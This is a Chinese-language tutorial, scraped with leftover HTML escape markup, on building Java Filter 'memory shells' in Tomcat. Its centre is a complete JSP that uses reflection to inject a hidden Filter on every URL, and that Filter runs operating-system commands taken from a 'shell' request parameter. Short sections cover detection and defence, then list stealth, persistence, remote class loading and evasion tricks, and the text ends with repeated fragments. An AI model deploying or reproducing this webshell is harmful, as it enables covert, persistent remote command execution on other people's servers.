Java Filter内存马分析与实现<\/h1>

1. Filter内存马概述<\/h2>

Filter内存马是一种基于Java Servlet Filter机制的无文件Webshell技术，它通过动态注入恶意Filter到运行中的Web容器（如Tomcat）来实现持久化控制。与传统的文件型Webshell相比，内存马具有以下特点：<\/p>

无需上传恶意文件到服务器<\/li>
直接驻留在内存中，难以通过文件扫描发现<\/li>
可以绕过常规的文件检测机制<\/li>

即使删除注入的JSP文件，内存中的Filter仍然有效<\/li> <\/ol>

2. 基本原理<\/h2>
Filter内存马的核心原理是利用Java反射机制和Tomcat内部API，动态地将恶意Filter添加到应用的Filter链中。当HTTP请求到达时，Tomcat会依次调用Filter链中的每个Filter，从而执行我们的恶意代码。<\/p>

2.1 Filter工作机制<\/h3>

标准Filter工作流程：<\/p>

客户端发送请求到Web服务器<\/li>
服务器根据URL匹配Filter映射<\/li>
创建FilterChain对象，包含所有匹配的Filter<\/li>
依次调用每个Filter的doFilter方法<\/li>

最后调用目标Servlet的服务方法<\/li> <\/ol>

2.2 内存马实现关键点<\/h3>

要实现Filter内存马，需要解决以下问题：<\/p>

如何在不修改web.xml的情况下动态添加Filter<\/li>
如何获取Tomcat内部对象（StandardContext等）<\/li>
如何构造完整的Filter组件（FilterDef、FilterMap、FilterConfig）<\/li>

如何将恶意Filter插入到现有Filter链中<\/li> <\/ol>

3. 详细实现步骤<\/h2>

3.1 基础Filter示例<\/h3>

package<\/span> com.naihe;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> javax.servlet.*;<\/span>
<\/span><\/span>import<\/span> java.io.IOException;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> FilertDemo<\/span> implements<\/span> Filter {<\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> init<\/span>(<\/span>FilterConfig filterConfig)<\/span> throws<\/span> ServletException {<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"初始化完成"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> doFilter<\/span>(<\/span>ServletRequest servletRequest,<\/span> ServletResponse servletResponse,<\/span> 
<\/span><\/span>                        FilterChain filterChain)<\/span> throws<\/span> IOException,<\/span> ServletException {<\/span>
<\/span><\/span>        servletRequest.<\/span>setCharacterEncoding<\/span>(<\/span>"utf-8"<\/span>);<\/span>
<\/span><\/span>        servletResponse.<\/span>setCharacterEncoding<\/span>(<\/span>"utf-8"<\/span>);<\/span>
<\/span><\/span>        servletResponse.<\/span>setContentType<\/span>(<\/span>"text\/html;charset=UTF-8"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 先放行请求，避免影响正常业务
<\/span><\/span><\/span><\/span>        filterChain.<\/span>doFilter<\/span>(<\/span>servletRequest,<\/span> servletResponse);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 恶意代码执行点
<\/span><\/span><\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>servletRequest.<\/span>getParameter<\/span>(<\/span>"shell"<\/span>));<\/span>
<\/span><\/span>        Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>servletRequest.<\/span>getParameter<\/span>(<\/span>"shell"<\/span>));<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"过滤中。。。"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> destroy<\/span>()<\/span> {<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"过滤结束"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>传统配置方式（web.xml）：<\/p>
<filter><\/span>
<\/span><\/span>    <filter-name><\/span>enfilter<\/filter-name><\/span>
<\/span><\/span>    <filter-class><\/span>com.naihe.FilertDemo<\/filter-class><\/span>
<\/span><\/span><\/filter><\/span>
<\/span><\/span><filter-mapping><\/span>
<\/span><\/span>    <filter-name><\/span>enfilter<\/filter-name><\/span>
<\/span><\/span>    <url-pattern><\/span>\/*<\/url-pattern><\/span>
<\/span><\/span><\/filter-mapping><\/span>
<\/span><\/span><\/code><\/pre>3.2 动态注入Filter的实现<\/h3>
要实现不修改web.xml的动态注入，需要了解Tomcat内部结构：<\/p>

ServletContext<\/strong> - Servlet规范接口，代表Web应用<\/li>
ApplicationContext<\/strong> - Tomcat对ServletContext的实现<\/li>
StandardContext<\/strong> - Tomcat中表示Web应用的容器<\/li>
Filter相关组件<\/strong>：

FilterDef - 存储过滤器名、实例等基本信息<\/li>
FilterMap - 存储过滤器名和URL模式的映射<\/li>
FilterConfig - 包含FilterDef和Filter对象<\/li>
<\/ul>
<\/li>
<\/ol>
3.2.1 关键类分析<\/h4>

ApplicationFilterChain<\/strong> - 维护当前请求的Filter链<\/li>
ApplicationFilterFactory<\/strong> - 负责创建FilterChain<\/li>
StandardWrapperValve<\/strong> - 调用ApplicationFilterFactory创建FilterChain<\/li>
<\/ol>
3.2.2 注入流程<\/h4>

获取ServletContext对象<\/li>
通过反射获取ApplicationContext<\/li>
通过反射获取StandardContext<\/li>
创建恶意Filter实例<\/li>
创建并配置FilterDef<\/li>
创建并配置FilterMap<\/li>
创建ApplicationFilterConfig<\/li>
将所有组件添加到StandardContext中<\/li>
<\/ol>
3.3 完整内存马实现代码<\/h3>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.Context" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterMap" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="org.apache.catalina.core.ApplicationFilterConfig" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterDef" %>
<%@ page import="org.apache.catalina.core.ApplicationContextFacade" %>
<%@ page import="org.apache.catalina.core.ApplicationContext" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="java.util.HashMap" %>
<%@ page import="java.io.IOException" %>
<%
    \/\/ 1. 反射获取ServletContext
    ServletContext servletContext = request.getServletContext();
    ApplicationContextFacade applicationContextFacade = (ApplicationContextFacade) servletContext;
    
    \/\/ 2. 获取ApplicationContext
    Field applicationContextFacadeContext = applicationContextFacade.getClass().getDeclaredField("context");
    applicationContextFacadeContext.setAccessible(true);
    ApplicationContext applicationContext = (ApplicationContext) applicationContextFacadeContext.get(applicationContextFacade);
    
    \/\/ 3. 获取StandardContext
    Field applicationContextContext = applicationContext.getClass().getDeclaredField("context");
    applicationContextContext.setAccessible(true);
    StandardContext standardContext = (StandardContext) applicationContextContext.get(applicationContext);
    
    \/\/ 4. 获取filterConfigs
    Field filterConfigs = standardContext.getClass().getDeclaredField("filterConfigs");
    filterConfigs.setAccessible(true);
    HashMap hashMap = (HashMap) filterConfigs.get(standardContext);
    
    String filterName = "Filter";
    if (hashMap.get(filterName) == null) {
        \/\/ 5. 创建恶意Filter实例
        Filter filter = new Filter() {
            @Override
            public void init(FilterConfig filterConfig) throws ServletException {
                System.out.println("注入初始化");
            }

            @Override
            public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, 
                               FilterChain filterChain) throws IOException, ServletException {
                servletRequest.setCharacterEncoding("utf-8");
                servletResponse.setCharacterEncoding("utf-8");
                servletResponse.setContentType("text\/html;charset=UTF-8");
                
                \/\/ 先放行请求
                filterChain.doFilter(servletRequest, servletResponse);
                
                \/\/ 恶意代码执行点
                System.out.println(servletRequest.getParameter("shell"));
                Runtime.getRuntime().exec(servletRequest.getParameter("shell"));
                System.out.println("过滤中。。。");
            }

            @Override
            public void destroy() {
                System.out.println("Filter销毁");
            }
        };
        
        \/\/ 6. 创建并配置FilterDef
        FilterDef filterDef = new FilterDef();
        filterDef.setFilter(filter);
        filterDef.setFilterName(filterName);
        filterDef.setFilterClass(filter.getClass().getName());
        standardContext.addFilterDef(filterDef);
        
        \/\/ 7. 创建并配置FilterMap
        FilterMap filterMap = new FilterMap();
        filterMap.addURLPattern("\/*");
        filterMap.setFilterName(filterName);
        filterMap.setDispatcher(DispatcherType.REQUEST.name());
        standardContext.addFilterMapBefore(filterMap);
        
        \/\/ 8. 创建ApplicationFilterConfig
        Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);
        constructor.setAccessible(true);
        ApplicationFilterConfig applicationFilterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef);
        
        \/\/ 9. 将filterConfig添加到filterConfigs中
        hashMap.put(filterName, applicationFilterConfig);
        
        response.getWriter().println("successfully");
    }
%>
<\/code><\/pre>
4. 技术细节分析<\/h2>
4.1 Tomcat内部对象获取<\/h3>


从ServletContext到StandardContext<\/strong>：<\/p>

ServletContext → ApplicationContextFacade → ApplicationContext → StandardContext<\/li>
需要通过反射访问私有字段"context"<\/li>
<\/ul>
<\/li>

Filter相关存储结构<\/strong>：<\/p>

StandardContext中维护三个重要集合：

filterDefs - 存储所有FilterDef<\/li>
filterMaps - 存储所有FilterMap<\/li>
filterConfigs - 存储所有FilterConfig<\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>
<\/ol>
4.2 Filter组件关系<\/h3>


FilterDef<\/strong>：<\/p>

包含Filter的名称、实例和类名<\/li>
通过StandardContext.addFilterDef()添加<\/li>
<\/ul>
<\/li>

FilterMap<\/strong>：<\/p>

定义Filter的URL匹配规则<\/li>
通过StandardContext.addFilterMapBefore()添加<\/li>
<\/ul>
<\/li>

FilterConfig<\/strong>：<\/p>

包装FilterDef和Context<\/li>
存储在StandardContext的filterConfigs Map中<\/li>
<\/ul>
<\/li>
<\/ol>
4.3 执行流程<\/h3>


请求到达Tomcat后，StandardWrapperValve会：<\/p>

调用ApplicationFilterFactory.createFilterChain()<\/li>
根据URL匹配FilterMap创建FilterChain<\/li>
从filterConfigs获取对应的FilterConfig<\/li>
<\/ul>
<\/li>

FilterChain执行时：<\/p>

按顺序调用每个Filter的doFilter方法<\/li>
最后调用目标Servlet的service方法<\/li>
<\/ul>
<\/li>
<\/ol>
5. 防御与检测<\/h2>
5.1 防御措施<\/h3>

禁用JSP上传功能<\/li>
限制反射API的使用<\/li>
使用SecurityManager限制敏感操作<\/li>
定期检查运行中的Filter列表<\/li>
监控Runtime.exec等危险方法的调用<\/li>
<\/ol>
5.2 检测方法<\/h3>


静态检测<\/strong>：<\/p>

检查是否有可疑的JSP文件<\/li>
检查web.xml是否有异常配置<\/li>
<\/ul>
<\/li>

动态检测<\/strong>：<\/p>

列出所有已注册的Filter<\/li>
检查Filter的类名和代码<\/li>
监控Filter的执行行为<\/li>
<\/ul>
<\/li>

内存检测<\/strong>：<\/p>

使用Java Agent技术扫描内存中的Filter实例<\/li>
检查Filter的类加载来源<\/li>
<\/ul>
<\/li>
<\/ol>
6. 高级技巧<\/h2>
6.1 隐蔽性增强<\/h3>

使用正常Filter类名伪装<\/li>
加密恶意代码<\/li>
延迟执行或条件触发<\/li>
模仿正常Filter的行为模式<\/li>
<\/ol>
6.2 持久化机制<\/h3>

注册ServletContextListener在应用重启后重新注入<\/li>
利用线程定期检查Filter状态<\/li>
通过JNDI或LDAP远程加载恶意类<\/li>
<\/ol>
6.3 绕过检测<\/h3>

使用Javaassist动态生成Filter类<\/li>
通过字节码技术修改已有Filter<\/li>
利用Tomcat的热部署机制<\/li>
<\/ol>
7. 总结<\/h2>
Filter内存马是一种高级的Web持久化技术，它利用了Java Servlet规范和Tomcat实现细节。理解其原理不仅有助于安全研究人员检测和防御此类威胁，也能帮助开发人员编写更安全的Web应用。防御Filter内存马需要从多个层面进行防护，包括文件上传控制、运行时监控和权限限制等。<\/p>

Java Filter内存马分析与实现<\/h1>

2. 基本原理<\/h2> Filter内存马的核心原理是利用Java反射机制和Tomcat内部API，动态地将恶意Filter添加到应用的Filter链中。当HTTP请求到达时，Tomcat会依次调用Filter链中的每个Filter，从而执行我们的恶意代码。<\/p>

3. 详细实现步骤<\/h2>

4. 技术细节分析<\/h2>

5. 防御与检测<\/h2>

6. 高级技巧<\/h2>

2. 基本原理<\/h2>
Filter内存马的核心原理是利用Java反射机制和Tomcat内部API，动态地将恶意Filter添加到应用的Filter链中。当HTTP请求到达时，Tomcat会依次调用Filter链中的每个Filter，从而执行我们的恶意代码。<\/p>